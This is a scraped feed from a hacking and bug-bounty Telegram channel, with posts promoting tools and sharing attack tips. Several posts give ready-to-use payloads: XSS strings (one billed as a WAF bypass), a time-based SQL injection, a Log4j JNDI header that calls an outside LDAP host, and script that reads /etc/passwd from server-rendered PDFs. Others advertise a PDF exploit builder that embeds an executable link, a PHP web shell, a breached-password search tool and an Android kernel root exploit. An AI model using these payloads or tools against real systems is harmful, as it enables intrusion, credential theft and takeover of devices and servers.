BugCod3
7.26K subscribers
334 photos
6 videos
7 files
444 links
[ BugCod3 ] โ€” From Shadows To Shells โšก๏ธ

๐Ÿ•ถ Hacking | ๐Ÿž Bug Bounty | ๐Ÿ” Security Tools
โš”๏ธ Learn โ€ข Hunt โ€ข Dominate

๐Ÿ‘ฅ Group: T.me/BugCod3GP
๐Ÿ“‚ Topic: T.me/BugCod3Topic

๐ŸŒ Web: BugCod3.com
๐Ÿค– Contact: T.me/BugCod3BOT
๐Ÿ“ง Email: BugCod3@protonmail.com
Download Telegram
๐Ÿ•ธ DigitalOcean OpenVPN/SOCKS for Burp Suite

๐Ÿ’ฌ
This Burp extension allows you to spin up a DigitalOcean droplet based on an OpenVPN configuration file. The droplet also functions as a SOCKS5 proxy to allow routing all Burp traffic through the VPN tunnel. The Burp proxy settings are automatically configured to route traffic through the SOCKS5 and OpenVPN droplet.

๐Ÿ‘โ€๐Ÿ—จ How to use:
๐Ÿ”ค Download the JAR from build/libs/digitalocean-droplet-openvpn-all.jar or build from source yourself;
๐Ÿ”ค Load the extension in Burp via the Extensions tab;
๐Ÿ”ค Create a DigitalOcean API token and enter your token on the extension tab "OpenVPN/SOCKS";
๐Ÿ”ค Select an OpenVPN configurataion file (.ovpn)
๐Ÿ”ค Click "Deploy" to start deploying the SOCKS and OpenVPN containers on a fresh droplet, and the extension will take care of the rest;
๐Ÿ”ค Allow up to a few minutes for the Docker image to complete installation before the proxy starts responding

๐Ÿ“Š Features:
โšช๏ธ Remember your DigitalOcean API token;
โšช๏ธ Remember your OpenVPN configuration file and credentials (optional) per project file;
โšช๏ธ Automatically shut down the droplet when Burp closes or the extension is unloaded;
โšช๏ธ A context menu so you can right-click > enable or disable tunnelling through the VPN
โšช๏ธ Opens a Repeater tab to ifconfig.co to easily verify if the VPN is working correctly

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Burp #Extension #bugbounty
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3โšก1๐Ÿ‘1๐Ÿ”ฅ1๐Ÿ’ฏ1
๐—ซ๐—ฆ๐—ฆ ๐—ถ๐—ป ๐˜๐—ต๐—ฒ .๐—ฐ๐˜€๐˜€ ๐—จ๐—ฅ๐—Ÿ ๐—ฝ๐—ฎ๐˜๐—ต

๐—ข๐—ฟ๐—ถ๐—ด๐—ถ๐—ป๐—ฎ๐—น ๐—จ๐—ฅ๐—Ÿ: "target/lib/css/animated.min.css"

๐—ซ๐—ฆ๐—ฆ ๐—™๐—ผ๐˜‚๐—ป๐—ฑ ๐—ถ๐—ป:
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3๐Ÿ‘3๐Ÿ”ฅ3โšก1๐Ÿ’ฏ1
This is very cool. Get cheatsheets in your terminal with a curl command!

โŒจ๏ธ Try this:
curl https://cht.sh/sqlmap

#Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3๐Ÿ‘3โšก1๐Ÿ”ฅ1๐Ÿ’ฏ1
๐Ÿ’€ LeakSearch ๐Ÿ’€

๐Ÿ’ฌ
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.

Requirements:
โšช๏ธ Python 3
โšช๏ธ Install requirements pip install -r requirements.txt

๐Ÿ’ป Usage:
LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Search #Parse #Password
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3โค2โšก1๐Ÿ‘1๐Ÿ’ฏ1
๐Ÿ”ฅ PDF-BUILDER (POC) - (Non Silent) ๐Ÿ”ฅ

๐Ÿ’ฌ
POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).

๐Ÿ’ป Usage:
Put your exe-link and build the PDF-FILE

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#C #PDF #Exploit
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3๐Ÿ”ฅ3โค2๐Ÿ‘Ž2
๐Ÿ•ท p0wny@shell:~# -- Single-file PHP Shell ๐Ÿ•ท

โš ๏ธ WARNING: THIS SCRIPT IS A SECURITY HOLE. DO NOT UPLOAD IT ON A SERVER UNLESS YOU KNOW WHAT YOU ARE DOING! โš ๏ธ

๐Ÿ’ฌ
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.

๐Ÿ“Š Features:
โšช๏ธ Command history (using arrow keys โ†‘ โ†“)
โšช๏ธ Auto-completion of command and file names (using Tab key)
โšช๏ธ Navigate on the remote file-system (using cd command)
โšช๏ธ Upload a file to the server (using upload <destination_file_name> command)
โšช๏ธ Download a file from the server (using download <file_name> command)

Demo with Docker:
docker build -t p0wny .
docker run -it -p 8080:80 -d p0wny
# open with your browser http://127.0.0.1:8080/shell.php


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#PHP #Shell #Pentesting
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3โšก2โค1
โค18๐Ÿคฃ8
If you find Web frameworks like Symfony, add
'/app_dev.php/_profiler/open?file=app/config/parameters.yml'
to the wordlist, and you may get juicy data.

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ”ฅ5โšก2โค1
Tip for Stored XSS Bypass on Profile Uploader:
+add magic number (jpg , jpeg)
+bypass file extention Protection

Magic Number

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก8โค1๐Ÿ‘1
Canarytokens

You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.

Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.

๐ŸŒ Site

#Pentesting #BugBounty
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก5
This media is not supported in your browser
VIEW IN TELEGRAM
Translate JavaScript to other writing systems!

Site

ฮ”YใƒญIแ—ใ‚ณฮž ๐Ÿ‘พ
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค2โšก2๐Ÿ”ฅ1
LFI Vulnerability Testing: Key Parameters

?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}

#BugBounty #infosec
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก2โค1๐Ÿ”ฅ1
For 0Day SQLI in

(app extension)

payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค2โšก1๐Ÿ‘1๐Ÿ”ฅ1
XSS to Exfiltrate Data from PDFs

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(โ€˜GETโ€™,โ€™file:///etc/hostsโ€™);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(โ€˜GETโ€™,โ€™file:///etc/passwdโ€™);x.send();</script>

How to use:
Server Side XSS (Dynamic PDF)

#XSS #PDF
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ”ฅ3โค2โšก1
โ”Œโ”€โ”€(BugCod3ใ‰ฟkali)-[~]
โ””โ”€$ sudo rm -rf *1402

โ”Œโ”€โ”€(BugCod3ใ‰ฟkali)-[~]
โ””โ”€$ sudo mkdir 1403


#Notification #NewYear
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค5โšก1๐Ÿ”ฅ1
If you are testing API, before fuzzing observe these:

1. Does it throw same data for /v1/user and /v1/user

2. Is it case sensitive?

/v1/user => 200 OK

/v1/USER => 200 OK

OR

/v1/user => 200 OK

/v1/User => 404

How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ‘3โค1โšก1๐Ÿ”ฅ1
Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก1โค1๐Ÿ”ฅ1
Log4j ๐Ÿ™Œ Application was running java

Vulnerable header :
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}

#BugBounty #Tips #Security
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก1โค1๐Ÿ”ฅ1
Easy P1 ๐Ÿ”ฅ
Add to your wordlist

/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2


#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค1โšก1๐Ÿ”ฅ1
Mali GPU Kernel LPE

Android 14 kernel exploit for Pixel7/8 Pro

This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:

Pixel 8 Pro: google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keys
Pixel 7: google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys

Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.

Github

โฌ‡๏ธ Download
๐Ÿ”“ BugCod3

#C #Exploit #Android #Kernel #Pixel
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค1โšก1๐Ÿ‘1๐Ÿ”ฅ1